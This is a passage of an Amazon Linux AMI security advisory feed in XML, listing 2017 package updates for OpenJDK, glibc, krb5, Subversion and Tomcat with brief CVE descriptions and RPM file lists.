CVE-2017-3241 OpenJDK: untrusted input deserialization in RMI registry and DCG (RMI, 8156802)
CVE-2017-3231:
1413717:
CVE-2017-3231 OpenJDK: URLClassLoader insufficient access control checks (Networking, 8151934)
CVE-2016-5552:
It was discovered that the Networking component of OpenJDK failed to properly parse user info from the URL. A remote attacker could cause a Java application to incorrectly parse an attacker supplied URL and interpret it differently from other applications processing the same URL.
1413882:
CVE-2016-5552 OpenJDK: incorrect URL parsing in URLStreamHandler (Networking, 8167223)
CVE-2016-5548:
A covert timing channel flaw was found in the DSA implementation in the Libraries component of OpenJDK. A remote attacker could possibly use this flaw to extract certain information about the used key via a timing side channel.
1413920:
CVE-2016-5548 OpenJDK: DSA implementation timing attack (Libraries, 8168728)
CVE-2016-5547:
It was discovered that the Libraries component of OpenJDK did not validate the length of the object identifier read from the DER input before allocating memory to store the OID. An attacker able to make a Java application decode a specially crafted DER input could cause the application to consume an excessive amount of memory.
1413764:
CVE-2016-5547 OpenJDK: missing ObjectIdentifier length check (Libraries, 8168705)
CVE-2016-5546:
It was discovered that the Libraries component of OpenJDK accepted ECDSA signatures using non-canonical DER encoding. This could cause a Java application to accept a signature in an incorrect format not accepted by other cryptographic tools.
1413911:
CVE-2016-5546 OpenJDK: incorrect ECDSA signature extraction from the DER input (Libraries, 8168714)
CVE-2016-2183:
A flaw was found in the way the DES/3DES cipher was used as part of the TLS/SSL protocol. A man-in-the-middle attacker could use this flaw to recover some plaintext data by capturing large amounts of encrypted traffic between TLS/SSL server and client if the communication used a DES/3DES based ciphersuite.
1369383:
CVE-2016-2183 SSL/TLS: Birthday attack against 64-bit block ciphers (SWEET32)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2183" title="" id="CVE-2016-2183" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5546" title="" id="CVE-2016-5546" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5547" title="" id="CVE-2016-5547" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5548" title="" id="CVE-2016-5548" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5552" title="" id="CVE-2016-5552" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3231" title="" id="CVE-2017-3231" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3241" title="" id="CVE-2017-3241" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3252" title="" id="CVE-2017-3252" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3253" title="" id="CVE-2017-3253" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3261" title="" id="CVE-2017-3261" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3272" title="" id="CVE-2017-3272" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3289" title="" id="CVE-2017-3289" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.121" release="0.b13.29.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.121-0.b13.29.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.121" release="0.b13.29.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.121-0.b13.29.amzn1.x86_64.rpm</filename></package><package 
name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.121" release="0.b13.29.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.121-0.b13.29.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.121" release="0.b13.29.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.121-0.b13.29.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.121" release="0.b13.29.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.121-0.b13.29.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.121" release="0.b13.29.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.121-0.b13.29.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.121" release="0.b13.29.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.121-0.b13.29.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.121" release="0.b13.29.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.121-0.b13.29.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.121" release="0.b13.29.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.121-0.b13.29.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.121" release="0.b13.29.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.121-0.b13.29.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.121" release="0.b13.29.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.121-0.b13.29.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.121" release="0.b13.29.amzn1" epoch="1" 
arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.121-0.b13.29.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.121" release="0.b13.29.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.121-0.b13.29.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.121" release="0.b13.29.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.121-0.b13.29.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-792</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-792: low priority package update for glibc</title><issued date="2017-02-06 18:00:00" /><updated date="2017-02-06 18:00:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-3075:
A stack overflow vulnerability was found in _nss_dns_getnetbyname_r. On systems with nsswitch configured to include &quot;networks: dns&quot; with a privileged or network-facing service that would attempt to resolve user-provided network names, an attacker could provide an excessively long network name, resulting in stack corruption and code execution.
1321866:
CVE-2016-3075 glibc: Stack overflow in nss_dns_getnetbyname_r
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3075" title="" id="CVE-2016-3075" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glibc-debuginfo" version="2.17" release="157.169.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.17-157.169.amzn1.x86_64.rpm</filename></package><package name="glibc-utils" version="2.17" release="157.169.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.17-157.169.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.17" release="157.169.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.17-157.169.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.17" release="157.169.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.17-157.169.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.17" release="157.169.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.17-157.169.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="157.169.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.17-157.169.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.17" release="157.169.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.17-157.169.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.17" release="157.169.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.17-157.169.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.17" release="157.169.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.17-157.169.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.17" release="157.169.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.17-157.169.amzn1.i686.rpm</filename></package><package name="glibc-headers" 
version="2.17" release="157.169.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.17-157.169.amzn1.i686.rpm</filename></package><package name="glibc" version="2.17" release="157.169.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.17-157.169.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.17" release="157.169.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.17-157.169.amzn1.i686.rpm</filename></package><package name="glibc-common" version="2.17" release="157.169.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.17-157.169.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="157.169.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.17-157.169.amzn1.i686.rpm</filename></package><package name="nscd" version="2.17" release="157.169.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.17-157.169.amzn1.i686.rpm</filename></package><package name="glibc-static" version="2.17" release="157.169.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.17-157.169.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="157.169.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.17-157.169.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-793</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-793: low priority package update for krb5</title><issued date="2017-02-06 18:00:00" /><updated date="2017-02-06 18:00:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-3120:
A NULL pointer dereference flaw was found in MIT Kerberos krb5kdc service. An authenticated attacker could use this flaw to cause krb5kdc to dereference a null pointer and crash by making an S4U2Self request, if the restrict_anonymous_to_tgt option was set to true.
1361050:
CVE-2016-3120 krb5: S4U2Self KDC crash when anon is restricted
CVE-2016-3119:
A NULL pointer dereference flaw was found in MIT Kerberos kadmind service. An authenticated attacker with permission to modify a principal entry could use this flaw to cause kadmind to dereference a null pointer and crash by supplying an empty DB argument to the modify_principal command, if kadmind was configured to use the LDAP KDB module.
1319616:
CVE-2016-3119 krb5: null pointer dereference in kadmin
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3119" title="" id="CVE-2016-3119" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3120" title="" id="CVE-2016-3120" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="krb5-devel" version="1.14.1" release="27.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-devel-1.14.1-27.41.amzn1.x86_64.rpm</filename></package><package name="krb5-server" version="1.14.1" release="27.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-1.14.1-27.41.amzn1.x86_64.rpm</filename></package><package name="krb5-server-ldap" version="1.14.1" release="27.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-ldap-1.14.1-27.41.amzn1.x86_64.rpm</filename></package><package name="krb5-workstation" version="1.14.1" release="27.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-workstation-1.14.1-27.41.amzn1.x86_64.rpm</filename></package><package name="libkadm5" version="1.14.1" release="27.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/libkadm5-1.14.1-27.41.amzn1.x86_64.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.14.1" release="27.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-pkinit-openssl-1.14.1-27.41.amzn1.x86_64.rpm</filename></package><package name="krb5-libs" version="1.14.1" release="27.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-libs-1.14.1-27.41.amzn1.x86_64.rpm</filename></package><package name="krb5-debuginfo" version="1.14.1" release="27.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-debuginfo-1.14.1-27.41.amzn1.x86_64.rpm</filename></package><package name="krb5-debuginfo" version="1.14.1" release="27.41.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-debuginfo-1.14.1-27.41.amzn1.i686.rpm</filename></package><package name="krb5-server" version="1.14.1" release="27.41.amzn1" 
epoch="0" arch="i686"><filename>Packages/krb5-server-1.14.1-27.41.amzn1.i686.rpm</filename></package><package name="krb5-devel" version="1.14.1" release="27.41.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-devel-1.14.1-27.41.amzn1.i686.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.14.1" release="27.41.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-pkinit-openssl-1.14.1-27.41.amzn1.i686.rpm</filename></package><package name="libkadm5" version="1.14.1" release="27.41.amzn1" epoch="0" arch="i686"><filename>Packages/libkadm5-1.14.1-27.41.amzn1.i686.rpm</filename></package><package name="krb5-libs" version="1.14.1" release="27.41.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-libs-1.14.1-27.41.amzn1.i686.rpm</filename></package><package name="krb5-server-ldap" version="1.14.1" release="27.41.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-ldap-1.14.1-27.41.amzn1.i686.rpm</filename></package><package name="krb5-workstation" version="1.14.1" release="27.41.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-workstation-1.14.1-27.41.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-794</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-794: medium priority package update for subversion mod_dav_svn</title><issued date="2017-02-06 18:00:00" /><updated date="2017-02-06 18:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-8734:
1397403:
CVE-2016-8734 subversion: unrestricted XML entity expansion in mod_dontdothat and Subversion clients using http(s)://
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8734" title="" id="CVE-2016-8734" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod_dav_svn-debuginfo" version="1.9.5" release="2.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_dav_svn-debuginfo-1.9.5-2.53.amzn1.x86_64.rpm</filename></package><package name="mod_dav_svn" version="1.9.5" release="2.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_dav_svn-1.9.5-2.53.amzn1.x86_64.rpm</filename></package><package name="mod_dav_svn-debuginfo" version="1.9.5" release="2.53.amzn1" epoch="0" arch="i686"><filename>Packages/mod_dav_svn-debuginfo-1.9.5-2.53.amzn1.i686.rpm</filename></package><package name="mod_dav_svn" version="1.9.5" release="2.53.amzn1" epoch="0" arch="i686"><filename>Packages/mod_dav_svn-1.9.5-2.53.amzn1.i686.rpm</filename></package><package name="subversion-libs" version="1.9.5" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-libs-1.9.5-1.56.amzn1.x86_64.rpm</filename></package><package name="mod24_dav_svn" version="1.9.5" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_dav_svn-1.9.5-1.56.amzn1.x86_64.rpm</filename></package><package name="subversion-python26" version="1.9.5" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-python26-1.9.5-1.56.amzn1.x86_64.rpm</filename></package><package name="subversion-ruby" version="1.9.5" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-ruby-1.9.5-1.56.amzn1.x86_64.rpm</filename></package><package name="subversion" version="1.9.5" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-1.9.5-1.56.amzn1.x86_64.rpm</filename></package><package name="subversion-perl" version="1.9.5" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-perl-1.9.5-1.56.amzn1.x86_64.rpm</filename></package><package 
name="subversion-debuginfo" version="1.9.5" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-debuginfo-1.9.5-1.56.amzn1.x86_64.rpm</filename></package><package name="subversion-python27" version="1.9.5" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-python27-1.9.5-1.56.amzn1.x86_64.rpm</filename></package><package name="subversion-devel" version="1.9.5" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-devel-1.9.5-1.56.amzn1.x86_64.rpm</filename></package><package name="subversion-tools" version="1.9.5" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-tools-1.9.5-1.56.amzn1.x86_64.rpm</filename></package><package name="subversion-javahl" version="1.9.5" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-javahl-1.9.5-1.56.amzn1.x86_64.rpm</filename></package><package name="subversion" version="1.9.5" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-1.9.5-1.56.amzn1.i686.rpm</filename></package><package name="subversion-devel" version="1.9.5" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-devel-1.9.5-1.56.amzn1.i686.rpm</filename></package><package name="mod24_dav_svn" version="1.9.5" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_dav_svn-1.9.5-1.56.amzn1.i686.rpm</filename></package><package name="subversion-ruby" version="1.9.5" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-ruby-1.9.5-1.56.amzn1.i686.rpm</filename></package><package name="subversion-perl" version="1.9.5" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-perl-1.9.5-1.56.amzn1.i686.rpm</filename></package><package name="subversion-debuginfo" version="1.9.5" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-debuginfo-1.9.5-1.56.amzn1.i686.rpm</filename></package><package name="subversion-python27" version="1.9.5" release="1.56.amzn1" 
epoch="0" arch="i686"><filename>Packages/subversion-python27-1.9.5-1.56.amzn1.i686.rpm</filename></package><package name="subversion-javahl" version="1.9.5" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-javahl-1.9.5-1.56.amzn1.i686.rpm</filename></package><package name="subversion-libs" version="1.9.5" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-libs-1.9.5-1.56.amzn1.i686.rpm</filename></package><package name="subversion-tools" version="1.9.5" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-tools-1.9.5-1.56.amzn1.i686.rpm</filename></package><package name="subversion-python26" version="1.9.5" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-python26-1.9.5-1.56.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-795</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-795: important priority package update for java-1.6.0-openjdk</title><issued date="2017-02-06 18:00:00" /><updated date="2017-02-06 18:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5597:
A flaw was found in the way the Networking component of OpenJDK handled HTTP proxy authentication. A Java application could possibly expose HTTPS server authentication credentials via a plain text network connection to an HTTP proxy if the proxy asked for authentication.
1386103:
CVE-2016-5597 OpenJDK: exposure of server authentication credentials to proxy (Networking, 8160838)
CVE-2016-5582:
It was discovered that the Hotspot component of OpenJDK did not properly check arguments of the System.arraycopy() function in certain cases. An untrusted Java application or applet could use this flaw to corrupt the virtual machine&#039;s memory and completely bypass Java sandbox restrictions.
1385402:
CVE-2016-5582 OpenJDK: incomplete type checks of System.arraycopy arguments (Hotspot, 8160591)
CVE-2016-5573:
It was discovered that the Hotspot component of OpenJDK did not properly check received Java Debug Wire Protocol (JDWP) packets. An attacker could possibly use this flaw to send debugging commands to a Java program running with debugging enabled if they could make the victim&#039;s browser send HTTP requests to the JDWP port of the debugged application.
1385544:
CVE-2016-5573 OpenJDK: insufficient checks of JDWP packets (Hotspot, 8159519)
CVE-2016-5554:
A flaw was found in the way the JMX component of OpenJDK handled classloaders. An untrusted Java application or applet could use this flaw to bypass certain Java sandbox restrictions.
1385714:
CVE-2016-5554 OpenJDK: insufficient classloader consistency checks in ClassLoaderWithRepository (JMX, 8157739)
CVE-2016-5542:
It was discovered that the Libraries component of OpenJDK did not restrict the set of algorithms used for JAR integrity verification. This flaw could allow an attacker to modify content of the JAR file that used weak signing key or hash algorithm.
1385723:
CVE-2016-5542 OpenJDK: missing algorithm restrictions for jar verification (Libraries, 8155973)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5542" title="" id="CVE-2016-5542" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5554" title="" id="CVE-2016-5554" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5573" title="" id="CVE-2016-5573" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5582" title="" id="CVE-2016-5582" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5597" title="" id="CVE-2016-5597" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.6.0-openjdk-src" version="1.6.0.41" release="1.13.13.1.77.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.41-1.13.13.1.77.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.41" release="1.13.13.1.77.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.41-1.13.13.1.77.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.41" release="1.13.13.1.77.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.41-1.13.13.1.77.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.41" release="1.13.13.1.77.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.41-1.13.13.1.77.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.41" release="1.13.13.1.77.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.41-1.13.13.1.77.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.41" release="1.13.13.1.77.amzn1" epoch="1" 
arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.41-1.13.13.1.77.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.41" release="1.13.13.1.77.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.41-1.13.13.1.77.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.41" release="1.13.13.1.77.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.41-1.13.13.1.77.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.41" release="1.13.13.1.77.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.41-1.13.13.1.77.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.41" release="1.13.13.1.77.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.41-1.13.13.1.77.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.41" release="1.13.13.1.77.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.41-1.13.13.1.77.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.41" release="1.13.13.1.77.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.41-1.13.13.1.77.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-796</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-796: medium priority package update for tomcat7 tomcat8</title><issued date="2017-02-14 12:00:00" /><updated date="2017-02-14 12:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-8745:
1403824:
CVE-2016-8745 tomcat: information disclosure due to incorrect Processor sharing
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8745" title="" id="CVE-2016-8745" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-jsp-2.3-api" version="8.0.41" release="1.69.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.0.41-1.69.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.0.41" release="1.69.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.0.41-1.69.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.0.41" release="1.69.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.0.41-1.69.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.0.41" release="1.69.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.0.41-1.69.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.0.41" release="1.69.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.0.41-1.69.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.0.41" release="1.69.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.0.41-1.69.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.0.41" release="1.69.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.0.41-1.69.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.0.41" release="1.69.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.0.41-1.69.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.0.41" release="1.69.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.0.41-1.69.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.0.41" release="1.69.amzn1" epoch="0" 
arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.0.41-1.69.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.75" release="1.25.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.75-1.25.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.75" release="1.25.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.75-1.25.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.75" release="1.25.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.75-1.25.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.75" release="1.25.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.75-1.25.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.75" release="1.25.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.75-1.25.amzn1.noarch.rpm</filename></package><package name="tomcat7" version="7.0.75" release="1.25.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.75-1.25.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.75" release="1.25.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.75-1.25.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.75" release="1.25.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.75-1.25.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.75" release="1.25.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.75-1.25.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.75" release="1.25.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.75-1.25.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" 
